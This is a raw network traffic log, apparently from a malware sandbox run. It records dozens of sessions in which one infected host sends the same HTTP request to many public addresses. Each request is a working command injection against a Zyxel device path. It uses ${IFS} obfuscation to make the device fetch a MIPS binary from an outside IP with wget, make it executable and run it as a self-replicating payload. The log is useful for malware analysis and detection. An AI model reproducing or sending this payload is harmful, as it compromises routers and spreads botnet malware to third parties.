                                                      Feb 2, 2024 06:35:40.357361078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1333192.168.2.1446590130.225.225.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.357386112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1334192.168.2.144619023.133.51.206443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.357445955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1335192.168.2.1454352193.65.61.35443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.357491016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1336192.168.2.1451732151.207.76.94443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.357522011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1337192.168.2.144363485.137.218.178443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.357583046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1338192.168.2.144007095.106.12.213443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.357629061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1339192.168.2.145245470.239.240.80443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.357673883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1340192.168.2.144974468.215.92.172443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.357697010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1341192.168.2.143737892.149.207.127443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.357719898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1342192.168.2.144448272.43.71.160443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.357775927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1343192.168.2.1438180203.221.86.138443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.357819080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1344192.168.2.1452674180.224.33.185443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.357860088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1345192.168.2.145056489.207.204.6443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.357906103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1346192.168.2.144928648.210.176.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.357920885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1347192.168.2.1457088149.179.212.35443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.358021975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1348192.168.2.145073074.12.31.62443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.358023882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1349192.168.2.1445690123.210.76.31443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.358119965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1350192.168.2.1441554208.61.31.244443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.358155966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1351192.168.2.1456410109.87.32.0443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.358159065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1352192.168.2.1443696195.166.246.33443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.358192921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1353192.168.2.1454624183.218.57.110443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.358230114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1354192.168.2.1445418176.17.110.161443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.358325958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1355192.168.2.1438360166.12.125.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.358331919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1356192.168.2.1442962191.222.118.27443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.358334064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1357192.168.2.144051885.240.177.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.358366013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1358192.168.2.1447874105.121.87.168443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.358432055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1359192.168.2.144127286.77.140.148443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.358453035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1360192.168.2.143994265.89.145.171443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.358509064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1361192.168.2.1452172199.248.75.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.358547926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1362192.168.2.146052292.234.200.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.358570099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1363192.168.2.1456514185.7.221.183443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.358618021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1364192.168.2.1453760162.182.113.136443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.358652115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1365192.168.2.1434986144.156.244.210443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.358691931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1366192.168.2.1440030201.80.168.242443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.358725071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1367192.168.2.143769471.42.135.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.358778954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1368192.168.2.1441638103.54.53.70443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.358838081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1369192.168.2.143339453.39.92.148443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.358859062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1370192.168.2.143885491.223.170.196443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.358908892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1371192.168.2.1445112142.191.133.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.358963013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1372192.168.2.144777831.82.48.236443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.358993053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1373192.168.2.1441342124.94.80.207443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.359020948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1374192.168.2.1451810138.66.115.125443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.359069109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1375192.168.2.14335888.136.218.161443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.359121084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1376192.168.2.1442106165.229.189.98443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.359155893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1377192.168.2.1441718156.51.168.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.359195948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1378192.168.2.1443560152.249.41.25443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.359226942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1379192.168.2.1445976182.12.137.116443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.359278917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1380192.168.2.1447758122.96.186.123443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.359304905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1381192.168.2.143287890.87.215.110443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.359352112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1382192.168.2.143365038.229.182.88443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.359389067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1383192.168.2.144227814.6.229.48443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.359424114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1384192.168.2.1436590112.110.50.252443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.359477997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1385192.168.2.1440662156.115.20.44443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.359536886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1386192.168.2.1433526199.49.163.37443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.359554052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1387192.168.2.1442704145.236.197.72443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.359612942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1388192.168.2.1446160115.190.194.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.359638929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1389192.168.2.1439232151.137.128.63443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.359682083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1390192.168.2.144919234.102.213.110443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.359723091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1391192.168.2.144188695.115.88.138443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.359762907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1392192.168.2.1453866205.226.243.30443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.359795094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1393192.168.2.1456800157.175.2.13443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.359859943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1394192.168.2.145936023.230.91.154443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.359893084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1395192.168.2.14535221.152.249.122443
                                                      TimestampBytes transferredDirectionData
